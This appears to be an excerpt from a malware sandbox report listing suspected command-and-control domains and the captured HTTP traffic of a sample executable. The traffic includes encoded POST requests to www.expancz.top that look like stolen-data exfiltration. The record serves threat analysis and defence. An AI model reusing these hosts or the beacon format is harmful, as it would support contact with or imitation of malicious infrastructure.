                                                            • www.expancz.top
                                                            • www.taxiquynhonnew.click
                                                            • www.learnwithus.site
                                                            • www.jijievo.site
                                                            • www.likesharecomment.net

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1149717161.97.142.144805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:22.604598999 CET545OUTGET /gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jh HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.070001325.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:05:23.195647001 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:23 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 2966
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "66cce1df-b96"
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                            Jan 10, 2025 22:05:23.195669889 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                            Jan 10, 2025 22:05:23.195683956 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                            Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                            Jan 10, 2025 22:05:23.195693970 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                            Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1149718107.155.56.30805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:39.082874060 CET804OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 30 79 5a 51 32 6d 6f 59 64 42 36 4a 46 6c 74 36 53 58 77 77 54 30 6a 71 78 63 63 32 4a 74 6e 51 3d 3d
                                                            Data Ascii: gtL8P=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC0yZQ2moYdB6JFlt6SXwwT0jqxcc2JtnQ==
                                                            Jan 10, 2025 22:05:40.030945063 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.1149719107.155.56.30805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:41.634426117 CET824OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 67 70 67 43 52 49 79 4f 54 73 49 37 62 2b 2b 52 7a 30 55 56 63 37 74 4d 59 5a 55 34 62 61 34 4d 45 46 33 49 50 63 31 65 68 6e 44 65 7a 62 68 51 45 50 4d 68 6f 69 65 6d 65 4f 4e 59 44 50 63 53 49 49 52 73 50 72 77 39 48 34 31 75 46 33 5a 48 42 53 30 76 6d 4c 4f 77 71 64 71 6f 6b 77 54 61 79 79 6e 73 41 69 65 32 66 43 52 4b 4d 45 63 2b 63 5a 32 4b 4e 6c 62 43 56 43 63 78 53 4c 68 49 4a 35 79 76 49 2f 39 5a 62 41 7a 6a 62 32 33 4d 51 73 56 48 73 6b 38 64 49 58 52 47 42 51 6f 6c 63 2f 66 33 55 57 79 70 2b 7a 62 48 49 3d
                                                            Data Ascii: gtL8P=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb23MQsVHsk8dIXRGBQolc/f3UWyp+zbHI=
                                                            Jan 10, 2025 22:05:42.564593077 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.1149720107.155.56.30805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:44.365710974 CET1837OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 6f 70 67 78 5a 49 7a 70 48 73 4c 37 62 2b 7a 78 7a 31 55 56 63 71 74 4d 41 56 55 35 6d 74 34 4b 49 46 78 62 48 63 6c 76 68 6e 59 4f 7a 62 2b 67 45 4d 54 52 6f 7a 65 6d 4f 4b 4e 59 7a 50 63 53 49 49 52 72 33 72 79 70 54 34 7a 75 46 30 65 48 42 57 77 76 6e 46 4f 30 47 4e 71 6f 51 4b 54 4c 53 79 69 34 73 69 63 45 48 43 54 71 4d 61 53 65 64 61 32 4b 52 6d 62 43 49 37 63 78 6d 68 68 4b 5a 35 33 2b 74 2b 68 36 76 69 6c 51 33 6a 73 2b 73 75 4b 55 51 7a 31 4f 51 54 61 45 78 45 74 6a 67 53 54 43 64 2b 70 72 53 55 4d 69 66 48 31 4b 65 32 66 7a 4a 47 78 50 61 4d 58 76 36 30 6c 62 4c 32 51 39 67 6a 6b 48 50 6b 53 6b 4e 54 66 66 6a 63 2f 6f 33 41 35 54 73 78 48 59 48 53 51 30 6b 71 2b 47 73 64 63 76 73 4e 67 64 6f 39 51 54 71 68 56 2b 35 7a 37 2f 70 34 45 70 47 4a 48 71 41 6a 52 4c 49 52 2b 35 4b 36 4e 55 44 5a 4e 62 64 6d 70 6c 78 32 46 46 59 5a 48 54 4c 6a 5a 32 75 45 [TRUNCATED]
                                                            Data Ascii: gtL8P=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsopgxZIzpHsL7b+zxz1UVcqtMAVU5mt4KIFxbHclvhnYOzb+gEMTRozemOKNYzPcSIIRr3rypT4zuF0eHBWwvnFO0GNqoQKTLSyi4sicEHCTqMaSeda2KRmbCI7cxmhhKZ53+t+h6vilQ3js+suKUQz1OQTaExEtjgSTCd+prSUMifH1Ke2fzJGxPaMXv60lbL2Q9gjkHPkSkNTffjc/o3A5TsxHYHSQ0kq+GsdcvsNgdo9QTqhV+5z7/p4EpGJHqAjRLIR+5K6NUDZNbdmplx2FFYZHTLjZ2uENQ82BeT4xf5FpIa25PHSiG7jVXrYaoI5ym5sgQeQ5yp6e8zBqMq637ySr7YPKMU7QCxOW7+nGdn3sLr6829YO2bqeuMcbZdLEvvZUv5p33FnmIpWp40VNIJqcMM+dCAbz7OoZQ/cG2298voQBhH7aWc+tGK4xQ2oFjHL5cLTTNjHVJaUx5ySWbrC0Hqq+2CuIYCPAENSUg7BQwMIcXn/YkdUeK8NyDw1AHlTqwaktQlJDCzbgyGKf3zEgyh5jXFj981IQmJMI37EJTAaRkwOC0YMW4at9JaLuPVSd3QKBRW7nmZ1y37ZezP4LAWMGUVD8kngDGVbG9l4O5RIoSqnV3PtTJDjVhM/SU74cpfaYzrgebaUO5PigNGU4tMu4KGoSyGethoiWXAhV2eC0pqKI3/dOseAuR4Y9rjSodkaAynNWV4sMHNuG6J2pVjcI+IBe3+FRrNAJle8nMWnTdMTE+25xrzsIb9g0EI8nn77/RlYo3Hv4Asr9Ecp5VQY1fnJjQJ2RCjx4WXsJtndugnOA5P5Q0Z4Vj1nmhC0OlP7vHy+mS7w8Pxtn1e9UKZBjB9p7Y+3OqvBskPcU4O85WKAml+dsF7Y6KEeye0UTBbBk4NhZYuuoX6jL2t4X56slyKBcr1hAjHqbr/L0v92DRnSMG7lecu9CMagL9 [TRUNCATED]
                                                            Jan 10, 2025 22:05:45.117206097 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.1149721107.155.56.30805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:46.911207914 CET543OUTGET /2gcl/?gtL8P=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&FZg8n=jDOt606X1jh HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.expancz.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:05:47.835131884 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 9651
                                                            Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "6736b650-25b3"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 77 65 62 73 69 74 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 69 74 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                            Jan 10, 2025 22:05:47.835191011 CET1236INData Raw: 2f 2f 6c 33 66 69 6c 65 6a 73 6f 6e 34 64 76 64 2e 6a 6f 73 79 6c 69 76 69 6e 67 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 74 79 70 65 3d 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 20 72 65 6c 3d 69 63 6f 6e 3e 3c 73 74 79 6c 65 3e 23 50 4f 50
                                                            Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                            Jan 10, 2025 22:05:47.835226059 CET1236INData Raw: bb a5 e5 8f 8a e4 bb a5 e5 90 8e e7 89 88 e6 9c ac e5 8f af e4 bb a5 e4 bd bf e7 94 a8 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c
                                                            Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                            Jan 10, 2025 22:05:47.835263014 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 6d 79 42 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6d 79 53 63 72 69 70 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 7d 65 6c 73 65 7b 0a 20 20 20 20 20
                                                            Data Ascii: myBody.appendChild(myScript); return true; }else{ return false; } }else{ return false; } } var pathInfo = ''; var baseJsUrl = isAtm ? 'https://dq0ib5xlct7tw.cloudfron
                                                            Jan 10, 2025 22:05:47.835295916 CET1236INData Raw: 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 75 69 64 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 53 34 28 29 2b 53 34 28 29 2b 22 2d
                                                            Data Ascii: .toString(16).substring(1); } function guid() { return (S4()+S4()+"-"+S4()+"-"+S4()+"-"+S4()+"-"+S4()+S4()+S4()); } if(!sessionStorage.sessionId) { sessionStorage.sessionId = guid(); }</script><script>if(localSt
                                                            Jan 10, 2025 22:05:47.835355997 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 69 66 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 6f 75 72 63 65 20 3d 3d 3d 20 73 6f 75 72 63 65 44 61 74 61 2e 74 69 6b 54 6f 6b 53 6f 75 72 63 65 29 20 7b 0a 20 20 20 20 20 20 21 20 66 75 6e 63 74 69 6f 6e 28 77
